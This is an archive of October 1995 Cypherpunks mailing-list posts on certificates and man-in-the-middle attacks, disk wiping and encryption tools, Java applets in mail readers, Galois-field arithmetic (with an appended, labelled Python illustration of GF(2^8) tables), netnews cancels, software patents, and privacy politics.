In-Reply-To: <199510091558.IAA05131@ix6.ix.netcom.com>
Message-ID: <199510091646.JAA29034@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
>This doesn't necessarily eliminate certificates - while you have a signed
>statement from Alice's key that she uses Bank Account X, and a signed statement
>from Alice's key authorizing transfer of $D from Bank Account X to Bank
>Account Y, the Bank, or a customer, may refuse to accept the request unless
>there's a signed statement from the Bank's key that Alice's key uses Account X.
>None of these need Alice's name, or for that matter the Bank's, as long as
>there's also a signed attribute statement from the Bank's key that it's a
>bank, etc.
>The meaning of the certificates changes a bit, but there's still a certificate
>from the bank binding Alice's Key to Alice's Bank Account.

I can see using keys with attributes in this way, for credentials or as
other forms of authorization.  But what about for communications privacy?
What is the attribute that tells you that using this key will prevent
eavesdropping?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 06:55:36 PDT
To: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Subject: Re: LACC: Account sharing leads to false imprisonment
In-Reply-To: <199510091346.OAA24239@neptune.ebi.ac.uk>
Message-ID: <199510091355.JAA24223@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Is this really cypherpunks material?

.pm

"J. R. Valverde (EMBL Outstation: the EBI)" writes:
> 
> Amazing! If I'm allowed to express my opinion!
> 
> >Thought you might like another perspective:
> >
> >...
> >>                             A GORRIE STORY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 07:58:31 PDT
To: jps@monad.semcor.com (Jack P. Starrantino)
Subject: Re: netscape  mail starts java attachments upon get new mail...
In-Reply-To: <9510091445.AA01297@monad.semcor.com>
Message-ID: <9510091458.AA27858@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Jack P. Starrantino writes:
 > Given JAVA's i/o capabilities

Java, per se, doesn't have any "I/O capabilities", in the same way
that neither C nor C++ do.  That said, it is the case that if your
mail reader allows incoming applets to send mail, you're in for
trouble.  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 9 Oct 95 07:07:00 PDT
To: hfinney@shell.portal.com
Subject: Re: Certificate proposal
In-Reply-To: <199510061910.MAA06560@comsec.com>
Message-ID: <9510091404.AA12463@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 5 Oct 1995 12:24:34 -0700
>From: Hal <hfinney@shell.portal.com>

>I don't understand this whole discussion.  A certificate is a signed
>binding of a key and a unique name, right?

It depends on how you define certificate.  If you define it this way, then
I'm proposing the elimination of certificates (because I'm eliminating the
unique name as something different from a key).

If you define certificate as I do -- as a bound statement of some attribute
of a key, then it should become clearer.  It's just that the attribute I'm
binding is not some unique person-name -- rather something like permission
to spend money from a bank account.

>I'd like to see some grounding of this discussion in terms of the role of
>certificates, and ways to prevent man in the middle attacks.  I certainly
>have no love for fascist worldwide ID cards and hierarchical, organization
>based naming schemes, but just using any old key because it seems to work
>OK most of the time isn't going to fly IMO.

The rest should be more clear if you read the rest of the backlog....

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Mon, 9 Oct 95 08:05:06 PDT
To: perry@piermont.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <30793a1135c8002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Perry E. Metzger said:
> 
> 
> I thought I'd ask here, since it's related to a lot of the stuff people
> have written for the PC platform in these parts. I need to securely
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> any of them selectively erase only data that isn't allocated to
> existing files?
> 

PC Tools has a wipe program that will either wipe individual files, or
wipe all unallocated diskspace. It also allows you to choose the level
of wipe (single overwrite, multiple, etc).

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 9 Oct 95 07:19:22 PDT
To: cypherpunks@toad.com
Subject: List Digest
Message-ID: <4XJPcD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Someone asked about a digest form for this list. I got out, dusted off, and
refurbished software I wrote last year to generate a RFC-1153 compatible
digest of alt.security.pgp for PRZ. I am now generating said digest. If
anyone wants it, send e-mail.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHkut974r4kaz3mVAQHz7wQAqMlM8CwmGGZmycWyPHYO/VJHT2Gr0mn7
G+WKvG1vKhzjP/RhF8hhQzRy5egwIKuasRZaFvV3qMbBheg8JvPwHAPf64/qKkNN
Xf2IRWHKT6BBuzDo5mxv/P4CW9W5lzmWLyDp+BPlNqbMNyMshkRyUTrdriWgtUIK
erJbEMu+7Ec=
=luqz
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Williams <peter@verisign.com>
Date: Mon, 9 Oct 95 10:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: Software Patents are Freezing Evolution of Products
Message-ID: <199510091730.KAA07041@dustin.verisign.com>
MIME-Version: 1.0
Content-Type: text/plain




>>Thesis: Software patents are a bad idea because they freeze the evolution
>>too early and payment metering schemes are too difficult to arrange, which
>>also helps to freeze evolution. Software patents are bad because customers
>>cannot freely and without entanglements incorporate the ideas into their
>>own products. The situation has become much worse with software, because
>>there is no physical object which can be used to meter usage of a patent.
 
It's nice to see a carefully reasoned argument.

Consider also reading

http://www.verisign.com/faqs/id_faq.html  
http://www.verisign.com/apple/cis.html

Comment:

The thesis is fundamentally flawed in the case of public-key applications
which provide or exploit digital signatures, as its assumptions are false,
patently. However, a gem of truth is revealed; however, possible outcomes
may be unpalatable as "pay-per-view".

Crypto metering for commercial-grade systems is easy. A number of companies,
including those who are bantering about the latest batch of payment protocols,
are beginning to really understand that to combat intruder-in-the-middle
attacks of the commercial end-systems' keying material, it's necessary to
authenticate the source of keying material used for all subsequent security
services. Contrary to the thesis, there are an ever evolving number of
practical ideas upon the nature of security services and secure applications.
(In fact, it's ever harder to track the explosion of innovation which is
actually happening.)

To combat the threat which intruder-in-the-middle represents to the key
exchange/agreement crypto underlying most applications, a notion of public-key
certificates was formulated. The certificate is a certified end-system key. 
The evaluation of the certificate requires users to consider trust models, as
someone "trusted" digitally signs the key to assert that the key is certified
for purpose X. The number of trust models being propounded is astounding; the
innovation wonderful to behold; contrary to the thesis. Two models are
prevalent - the Kent RFC 1422 model which uses third-parties to base
non-repudiation services, and the Zimmermann PGP model which does not use
third-parties, and accomplishes something other than non-repudiation. Other
models are in heated discussion!

There is a little truth in the thesis that asserting upfront to the
licensor the nature of your idea does hamper innovation. However, a solution
may be at hand. Note, anyway, that (a) RSA is an excellent public-key scheme
which is free of patent restrictions anywhere in the world except US
territories (b) personal use of RSA in the US is effectively unlicensed (see
PGP/PGPfone) (c) RSAREF is a free reference implementation available for
developers to innovate with, before deciding how to make their ideas
commercially available (d) there are lots of competitive providers of RSA
stuff supporting many form-factors and packaging styles. So either all
innovation occurs in the US, else free public availability is not the key to
idea generation. Both these conclusions are patently wrong, in my view.

What's a solution?

Well there is a solution which gets rid of the up-front, tell-all requirement.
It's called controlled certificate issuance. Given the importance of the
certificate role, if one meters certificate issuance such that a postage-stamp
fee goes to the licensor for each key used in any idea, for any purpose,
however often or valuable-a-transaction, then the developer is effectively
freed up - in terms of innovation. The keying material can be Diffie-Hellman,
knapsack, anything the developer likes.

What's the downside - well it's like having a pay-per-view box on your company
TV. Still, this is highly regarded by many industries and is the basis of much
competition in the broadcasting & programming distribution industry. Some
people really object to pay-per-view. But then, some people object to
inventors getting benefit from their discovery. One metering product is the BBN
safekeyper. Metering certificates causes about as much hate mail as MIT patent
enforcement though. So beware about even thinking about reading the following
pages for more information about the options and issues:

http://www.verisign.com/faqs/id_faq.html - for digital ID material (lots of 
references)

http://www.verisign.com/apple/cis.html - for metering and "simple" licensing



How do we do away with the say-it-all-up-front restriction, which is currently
the only means whereby the licensor can collect a negotiated fee?

RSA DSI invested heavily in a hardware product for metering the issuance of
those critical certificates. That is, any developer w






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 10:28:50 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <ac9ea8f3010210049f44@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:46 PM 10/9/95, Hal wrote:
>Bill Stewart <stewarts@ix.netcom.com> writes:
....
>>also a signed attribute statement from the Bank's key that it's a bank, etc.
>>The meaning of the certificates changes a bit, but there's still a certificate
>>from the bank binding Alice's Key to Alice's Bank Account.
>
>I can see using keys with attributes in this way, for credentials or as
>other forms of authorization.  But what about for communications privacy?
>What is the attribute that tells you that using this key will prevent
>eavesdropping?

For communication, the only credential Alice needs to ensure that only Bob
can read her message is that she uses Bob's public key. If "Bob the Key"
reads it, presumably it was "Bob the Person" who read it.

(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
let his private key out, so that Chuck the Person is also able to read the
Bob the Key stuff, etc., then of course cryptography cannot really handle
this situation.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Mon, 9 Oct 95 07:42:11 PDT
To: cypherpunks@toad.com
Subject: Re: netscape  mail starts java attachments upon get new mail...
Message-ID: <9510091445.AA01297@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone remember the problem IBM had back ~10 years on X'mas, when
someone sent an embedded 'script' greeting card to multiple 'profs'
addresses?  When the mail was opened the 'script' procedure was
executed, resulting in the card being forwarded to everyone in the
recipient's address book.  It didn't take too many iterations of this
to drag IBM's net to its knees.

Given JAVA's i/o capabilities, I'm a little concerned about mating it
with my mail reader.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 9 Oct 95 08:47:51 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Disk Encryption Software
Message-ID: <Pine.ULT.3.91.951009104501.5569B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi all, I figured this was a good crew to ask this question of.  Does 
anybody know of some kind of disc encryption software that would work 
with W95 and a ZIP drive?  What I'd like to be able to have is an 
encrypted disc that when I put it in, it would demand a passphrase, and 
then it would be unlocked for working.  Incorrect passphrase and it's 
still gibberish.  Does this kind of implement exist yet? :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMHkoMjokqlyVGmCFAQHHeAP9HfALv1lJxFOhVn18/yjhbS90ekGGo60H
qMF+KcCupdpY/wYYdvImZr2gjbfIGSutI0najla5XJbH5Jp95Gk9Fy5n3SnvJanc
bIIipD+fMBitzjjz54DvEj0TxCYoVJaSeXhKcforfYeuetIA4YwGuksP1yOpivc0
hDOQwxgELDI=
=XXhK
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 9 Oct 95 08:00:09 PDT
To: Usuario Acceso2 <acceso2@diatel.upm.es>
Subject: Re: Question on Galois Fields
Message-ID: <199510091456.KAA05542@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 10/9/95 UTC+0100, you wrote:
>Can anyone explain or give an example of how to use arithmetic in GF(q^n)?
>
>Often in cryptography we work in GF(p). I knew the existence of other fields,
>like elliptic curves and so, but I found a short comment in Applied
>Cryptography page 210 that I couldn't understand.

I wrote a Reed-Solomon encoder that had to do addition and multiplication
over GF(2^8). Addition was simple, just a bitwise exclusive-or.
Multiplication required two tables, a log-alpha table and an alog-alpha
table. The product was computed by taking the anti-log of the sum of
the logs of the arguments. Both tables were 256x8 lookup tables. The table
contents were derived from the generator polynomial G(x) specified
for the encoder. Another two 256x8 tables were used to translate between
dual basis and conventional basis. Dual basis was specified for the
encoder to make a hardware implementation simpler but I found that it was
easier to use conventional basis for a software implementation.

Not being a mathematician, I used several NASA technical reports on
Reed-Solomon encoders and an excellent book on error correcting codes
by Lin & Costello to understand enough of the math to write the
encoder software. Galois fields are heavily used in the design of
error correcting codes.



--
John A. Limpert
johnl@Radix.Net
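
Added example (not part of the original post and not the poster's encoder): GF(2^8) addition as XOR and multiplication through log/antilog tables, as described above, checked against plain shift-and-reduce multiplication. The post does not say which polynomial its encoder used, so the field polynomial x^8 + x^4 + x^3 + x^2 + 1 (0x11D) with alpha = 2 is an assumption; the dual-basis translation tables are not covered.

```python
"""GF(2^8) arithmetic with log/antilog tables (added illustration)."""

FIELD_POLY = 0x11D  # assumption: x^8 + x^4 + x^3 + x^2 + 1; the post names none
ALPHA = 0x02        # assumption: alpha = x, primitive for this polynomial


def build_tables(poly=FIELD_POLY):
    """Return (log, alog) with alog[i] = alpha^i and log[alog[i]] = i."""
    alog = [0] * 255
    log = [None] * 256            # log[0] stays None: zero has no logarithm
    value = 1
    for exponent in range(255):
        if log[value] is not None:
            # alpha's powers repeated before covering all 255 nonzero elements
            raise ValueError("polynomial is not primitive for alpha = x")
        alog[exponent] = value
        log[value] = exponent
        value <<= 1               # multiply by alpha (= x)
        if value & 0x100:         # degree-8 term appeared: reduce modulo poly
            value ^= poly
    return log, alog


LOG, ALOG = build_tables()


def gf_add(a, b):
    """Addition (and subtraction) in GF(2^8) is bitwise exclusive-or."""
    return a ^ b


def gf_mul(a, b):
    """Product = antilog of the sum of the logs, exponents taken mod 255."""
    if a == 0 or b == 0:          # zero has no log; handle it explicitly
        return 0
    return ALOG[(LOG[a] + LOG[b]) % 255]


def gf_inv(a):
    """Multiplicative inverse: alpha^(255 - log a)."""
    if a == 0:
        raise ZeroDivisionError("0 has no inverse in GF(2^8)")
    return ALOG[(255 - LOG[a]) % 255]


def gf_mul_reference(a, b, poly=FIELD_POLY):
    """Table-free shift-and-add multiplication, used to validate the tables."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= poly
        b >>= 1
    return result


def tables_match_reference():
    """True if the table method agrees with the reference for all 65536 pairs."""
    return all(gf_mul(a, b) == gf_mul_reference(a, b)
               for a in range(256) for b in range(256))


if __name__ == "__main__":
    print("alpha^8 =", hex(ALOG[8]))
    print("0x53 + 0xCA =", hex(gf_add(0x53, 0xCA)))
    print("3 * 3 =", gf_mul(3, 3))
    print("tables agree with reference:", tables_match_reference())
```

Table lookups indexed by secret values are not constant-time, which matters when this arithmetic is used inside a cipher rather than an error-correcting code.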





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Mon, 9 Oct 95 08:45:40 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510091458.AA00712@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I agree with Tim that the future is likely to hold much evil -- as it
always has -- and that privacy is unfortunately likely to play an
important role in some of that evil -- as it always has.  But my
analysis of the problem has a subtly different perspective.

We mustn't forget that, until very recently, strong, widespread
privacy has been humanity's "default" condition.  The evils to which
Tim alluded would in my opinion be more accurately described as
arising out of general advances in communication and consequent new
market efficiencies.  Progress always has two faces.

The ob-crypto question here is, must we now rely upon pervasive LEA
surveillance as humanity's only effective defense against the new
evils created by technological progress?  In other words, are we
entering an era in which it is simply becoming TOO DANGEROUS to allow
ourselves the traditional luxury of strong, widespread privacy?

Many people, especially in government, seem to be answering the above
question strongly in the affirmative.  The Cypherpunks, on the other
hand, have rallied around the idea that the unprecedented loss of
privacy is itself an evil against which others pale by comparison.

I admit it is a question which troubles me.  I can only fall back on
the principle that, as I believe Thomas Jefferson put it (quoting
approximately from memory), "There is no ultimate safe repository for
power other than in the people."  Our only hope is in ourselves.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHk4ZF11Wd4tm8clAQGFfwQAniCTN2dJ+3DrYHFXSq/dPfAzNggxkjlL
r3ImCFcCA8JhXBUnGhon76eGtoAlAuuLMeFktACgI35TS+PU7oLtR/FRq68IxldD
opnY+CA+4JstBkVHhnMfvW3UX4jZeo9MckaHdxwoZtwtM+D/pERw2Mb2M5r/uHA8
FQFfjsl1vBk=
=kC7f
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Mon, 9 Oct 95 08:00:15 PDT
To: stu@nemesis.wimsey.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <m0t2Ffg-0000VgC@nemesis>
Message-ID: <m0t2Jg8-0000rmC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Stuart Smith enscribed thusly:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <v02110105ac99c03922dd@[204.179.132.4]> you write:
> >The downsides of having the mechanism (especially unauthenticated) we see
> >now: official and unofficial squelching of articles that someone doesn't
> >like for whatever arbitrary or situational reason.
> 
> You miss an important point in the mechanism - individual sites *choose*
> whether or not to pay any attention to cancels.  Theoretically, they could
> be configured to only listen to cancels from certain places etc etc.  By all
> means these should be authenticated, but it is vital to remember that this
> is still (for now..) an anarchy.  I don't have to honour anyone's cancels,
> and if I do, and you don't like it - you don't have to get a news feed from
> me.

	(No doubt, you are going to get hammered heavily on this from multiple
sides, but here is my shot anyways.)

	Actually you miss a very critical point.  This choice is, in fact,
a "Hobson's Choice", a choice that is no choice.  If any site between you
and the article source chooses to honor that cancel, you never get the
original article to begin with.  All you get is the cancel message and your
choice to honor it or not is totally meaningless.  To be worth anything
all of the intermediate nodes would have to choose to ignore cancel messages
and then the leaf nodes would have the privilege of honoring or ignoring
them.  But it will be a VERY cold day in a VERY warm place before that ever
happens, even if it did make sense (It doesn't).

	Yes yes, I know - article loss is contingent upon the cancel arriving
there before you pick up the article from them, this effect would just serve
to add a level of chaos and indeterminacy to the mechanism.  Obviously
(because of time elements involved in realization and forging of cancels)
it is much more likely that you will receive originals for articles where a
forged cancel is received.  That depends on the latency involving all of
the news feeds between you and the article source and the latency involving
the forger and his ability to recognize a message he wants to cancel and
to get that cancel out.  The human factor adds a lot here.  Perhaps we
should add a "time-limit" to cancel messages?  This too would be highly
indeterminate as propagation times stretched out.

	End result is that most sites currently do honor cancels, so many
of the originals never reach a lot of the leaf nodes while all of us
continue to be subjected to a FLOOD of cancel control messages.  In terms
of message count and article numbers (not total bytes of storage) my control
group is the largest newsgroup group on my system!

	Regards,
	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Oct 95 08:16:12 PDT
To: cypherpunks@toad.com
Subject: Crypto's Role in Evil?  HUG_kid
Message-ID: <199510091516.LAA24285@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-9-95. NYPaper:


   "The Greening of U.S. Diplomacy: Focus on Ecology."

      A new concern over the long-term causes of wars and
      disasters of the environment are the issues deemed
      urgent today by American foreign policy makers in much
      the same manner as military threats like new
      surface-to-air missile sites alarmed policy makers
      several decades ago. So in addition to their traditional
      intelligence gathering -- arms, nuclear weapons
      programs, expansion of foreign armies -- American policy
      makers are looking more than ever before at natural
      phenomena in their search for the deeper roots of war
      and threats to global security.

      "During the cold war, most security threats stemmed from
      state-to-state aggression, so most of the analysis was
      of factors that could produce state-to-state
      aggression," said James Steinberg, the State
      Department's director of policy planning. "Now we're
      focusing more on internal factors that can destabilize
      governments and lead to civil wars and ethnic strife.
      Now we're paying much more attention to early warning
      factors, like famine and the environment."

      Angelo Codevilla, an intelligence expert who teaches at
      Boston University, said this new approach is misguided.
      "All this soft stuff is a silly idea," he said.


   HUG_kid  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 11:07:50 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <ac9eafac0202100433c6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM 10/9/95, Lucky Green wrote:

>Correct, Blanc. That's why I am saving my pennies to buy an AR-15. I know
>the government of the near future will not be in a position to stand in
>the way of my involuntary participation in organ transplant experiments.
>It will be up to the individual and voluntary neighborhood associations,
>etc. to provide our personal security.

While I don't want to comment on AR-15s and the possible need for them,
this being a strong cryptography group, this is a good time to mention to
newcomers to the list that the book "Snow Crash," by Neal Stephenson,
offers a wickedly satirical look at a possible future for America. (Other
books of interest include: Vernor Vinge's "True Names," David Friedman's
"The Machinery of Freedom," Hakim Bey's "TAZ," Orson Scott Card's "Ender's
Game," Ayn Rand's "Atlas Shrugged," and John Brunner's "The Shockwave
Rider.")

One of the reasons I advocate having a minimal set of laws and then
strongly enforcing them is that having too many laws makes enforcement of
the _important_ laws very difficult. Having too many laws, such as the laws
about what one can do with one's own money (chillingly recounted this
morning by Doug Barnes in his trip report), also blurs the lines between
what is really criminal and what it is not.

It's clear that cops cannot protect people, only try to catch the perpetrators.

In certain demographic groups, 30% of all males between the ages of 15 and
30 are either in jail, are awaiting trial, are on probation, or have been
in jail. California is on a massive prison-building campaign. (Many of
these prisons would not be needed if essentially all behaviors except
murder, rape, theft, etc., were legal, and if transfer payments into inner
cities were cut off...the "criminal" gangs would not have much to do and
would wither away in time.)

Given the current trends, certain courses of action become clear.

(Personal note: I'm amazed at the number of "punks" of various flavors who
continue to live in crowded cities, given the capabilities of
communications technology, and the race wars now accelerating in these rat
cages. But then I'm not one of those dressed-in-black-with-noserings kind
of "punk." To each their own.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 9 Oct 95 11:52:13 PDT
To: cypherpunks@toad.com
Subject: PC wipe utilities
Message-ID: <199510091852.LAA14988@well.com>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" <perry@piermont.com> asks:

>I thought I'd ask here, since it's related to a lot of the stuff
>people have written for the PC platform in these parts. I need to
>securely wipe a bunch of data from an MS-DOS hard drive, so that
>it can't be recovered. Are there any readily available utilities
>for this? Will any of them selectively erase only data that isn't
>allocated to existing files?

>Perry

Alan Penny's  excellent freeware utility wipe.zip has been
uuencoded and sent to you. I believe it fulfills your requirements.

 As recently as the last issue of WIRED an article by a data
recovery company claimed they could recover data that had been
overwritten nine times...... make it a baker's dozen to be safe.


Brian D Williams




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 9 Oct 95 08:53:23 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510091458.AA27858@alpha>
Message-ID: <LAA00780.199510091552@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510091458.AA27858@alpha>, Mike McNally writes:
>Jack P. Starrantino writes:
> > Given JAVA's i/o capabilities
>
>Java, per se, doesn't have any "I/O capabilities", in the same way
>that neither C nor C++ do.  That said, it is the case that if your
>mail reader allows incoming applets to send mail, you're in for
>trouble.  

As far as I know Java apps can only make network connections to the
IP address they were loaded from.  There may be more restrictions
than that as well.

So if they were going to mail-bomb they would have to hurt the site
that was giving out the Java app (by sending all the mail to it to
be relayed back), and in fact it could be done more effectively with
a "simple" CGI script.

This isn't to say it is infeasible - someone could write a general
purpose Java applet (say something that makes cool looking animated
bullets for lists) that when loaded from a specific IP address/domain
(say www.clueless.org) would then do something bad.  However exactly
who you can harm isn't exactly as broad as I assume "pranksters" would
like, and how badly you can harm them may not be as harmful as
"terrorists" would like, but it seems to be simpler to do than *I*
would like!

OBcrypto: in one of the Java papers I saw a reference to use of RSA
signatures to allow browser users to say things like "I trust Sun
(or Tim May) to write applets that use Foo not to harm me".  It
wasn't in the public release of HotJava because of licensing
constraints.  Any speculation on whether Netscape will (eventually)
support that feature?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Mon, 9 Oct 95 10:00:52 PDT
To: cypherpunks@toad.com
Subject: HTTP anon proxy pointers
Message-ID: <3079552b450e002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I seem to recall that someone was working on an anonymous http
proxy a couple months ago. Pointers would be appreciated. Thanks.

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 12:04:29 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <199510091903.MAA22499@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
>For communication, the only credential Alice needs to ensure that only Bob
>can read her message is that she uses Bob's public key. If "Bob the Key"
>reads it, presumably it was "Bob the Person" who read it.

>(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
>let his private key out, so that Chuck the Person is also able to read the
>Bob the Key stuff, etc., then of course cryptography cannot really handle
>this situation.)

OK, but again, what about the man in the middle attack?  Suppose the
key that you found that claims to be from Bob is actually not his, but
another one created by a man in the middle, such as Bob's malicious
ISP?  Then that ISP is decrypting the messages Alice sends to him using
that fake key, and re-encrypting them using Bob's real key.  He is
reading all of the messages, and Alice and Bob do not in fact have
communications privacy.

I don't want to overstate the risk of this attack.  It would not be an
easy one to mount and I believe there are countermeasures which could
detect it unless the MITM had nearly supernatural powers.  But the MITM
attack is normally considered seriously in discussing crypto protocols.
It is a well known weakness in Diffie-Hellman, for example.  That is why
authenticated Diffie Hellman is used in some of the newly proposed key
exchange protocols for IP.  The risks of MITM attacks on public key
